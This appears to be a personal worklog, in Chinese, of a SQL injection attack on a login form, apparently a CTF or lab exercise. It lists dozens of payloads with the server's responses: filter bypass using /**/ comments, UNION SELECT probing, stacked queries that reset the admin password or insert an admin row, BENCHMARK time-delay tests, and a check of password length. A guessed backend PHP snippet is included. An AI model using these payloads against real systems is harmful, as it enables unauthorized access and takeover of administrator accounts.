确定用户名user不存在,admin存在

username: user' 'a'='a        密码错误    =>   mysql

username: user' and 'a'='a    用户名错误　 =>   未过滤and

user' union select username from admin where username='admin   	=> 500

user' union select username from admin where username='admin'-- => 500

user' union select 'admin' -- 					=> 500

user' union select 'admin					=> 500

sql1: select * from admin where username='?' and password='?'

sql2: select password from admin where username='?'

下面猜解表名，如果猜解顺利，则可能是ｓｑｌ２

' or exists (select * from admin)				=> 500
可能过滤了select

' or exists (select 1)						=> 500

' or exists (seselectlect 1)					=> 500

' or exists (selectselect 1)					=> 500


想确定一下有几列
admin' order by １						=> 500
过滤了order by吗？？？？


adselectmin							=> 用户名错误
貌似没被过滤？

user'/**/union/**/select/**/'admin				=> 密码错误

确认sql语句为sql2

'/**/or/**/exists/**/(select/**/1) 				=> 500

'/**/or/**/exists/**/(select/**/1);'      =>密码错误

'/**/or/**/exists/**/(select/**/username/**/from/**/admin);'  =>密码错误

'/**/or/**/exists/**/(select/**/password/**/from/**/admin);'  =>密码错误

admin'/**/union/**/select/**/username/**/from/**/admin/**/where/**/'a'='a	=>密码错误密码错误　　　200

admin'/**/union/**/select/**/username/**/from/**/admin/**/where/**/id='1	=>密码错误密码错误	　　　　200

user'/**/union/**/select/**/username/**/from/**/admin/**/where/**/id='1   =>密码错误

user'/**/union/**/select/**/'admin                                        =>密码错误

user'/**/union/**/select/**/'admin                                        =>密码错误


user'/**/union/**/count(username)

fetch
update set admin
user'/**/union/**/select/**/'admin';insert/**/into/**/admin(username,password)/**/values('admin','admin');'



后台猜解

$username = escape($_GET["username"]);
$password = escape2($_GET["password"]);

$sql1 = 'select password from admin where username='.$username;
$sql2 = '

$result = mysql_query($sql);
$rowcount = mysql_num_rows($result);

if ($rowcount == 0){
  echo "用户名错误";
}else{
  while($rowcount--){
    if ($username==admin and $password == $result){
      echo "登陆成功";
    }else{
      echo "密码错误";
    }
  }
}



user'/**/union/**/select/**/'admin';update/**/admin/**/set/**/password='admin'/**/where/**/username='admin');'   =>密码错误


user';update/**/admin/**/set/**/password='admin'/**/where/**/username='admin');'                                 =>用户名错误


admin';update/**/admin/**/set/**/password='admin'/**/where/**/username='admin');'                                =>密码错误


admin'/**/u nion/**/select/**/'admin'/**/union/**/select/**/'admin'/**/union/**/select/**/'admin                 =>密码错误密码错误


user';update/**/admin/**/set/**/password='admin'/**/where/**/username='admin');select/**/'admin                 =>用户名错误


admin'/**/union/**/select/**/'admin'/*                                                                          =>500

user'/**/union/**/select/**/count(username)>1/**/from/**/admin;'                                                =>密码错误


user'/**/union/**/select/**/username/**/from/**/admin/**/where/**/id=1;'                                        =>密码错误


user'/**/union/**/select/**/username/**/from/**/admin/**/where/**/id=2;'                                        =>用户名错误


user'/**/union/**/select/**/password/**/from/**/admin/**/where/**/id=2;'                                        =>用户名错误


admin'/**/union/**/select/**/benchmark(10000000,encode('hello','mom'));'                                        =>密码错误密码错误  时间延迟

admin';select/**/benchmark(1000000000,encode('hello','mom'));'                                                  =>密码错误 延时


admin'/**/union/**/select/**/'admin1'/**/union/**/select/**/'admin2                                             =>密码错误密码错误密码错误

admin'/**/union/**/select/**/'admin1'/**/union/**/select/**/'admin2'/**/union/**/select/**/'admin3              =>密码错误*4

user'/**/union/**/select/**/password/**/from/**/admin/**/where/**/length(password)=32;'                         =>密码错误  确认密码为32位




select * from admin where


1
